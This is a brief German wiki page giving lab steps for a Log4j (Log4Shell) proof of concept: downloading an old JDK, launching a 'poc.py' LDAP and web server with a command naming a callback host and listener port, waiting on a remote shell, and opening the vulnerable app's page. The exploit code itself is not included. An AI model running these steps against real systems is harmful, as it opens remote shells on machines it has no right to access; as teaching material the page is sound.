Log4j

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Schaubild

Proof of Concept

Download und entpacken

  • jdk-8u20-linux-x64.tar.gz

Starten des LDAP und Webservers

  • python3 poc.py --userip brian.x-men.de --webport 8000 --lport 4545

Log4j-1.png

Remoteshell listining

Log4j-2.png

App starten eventuell auf anderem Rechner

Webseite öffnen

Log4j-3.png Log4j-4.png

Exploit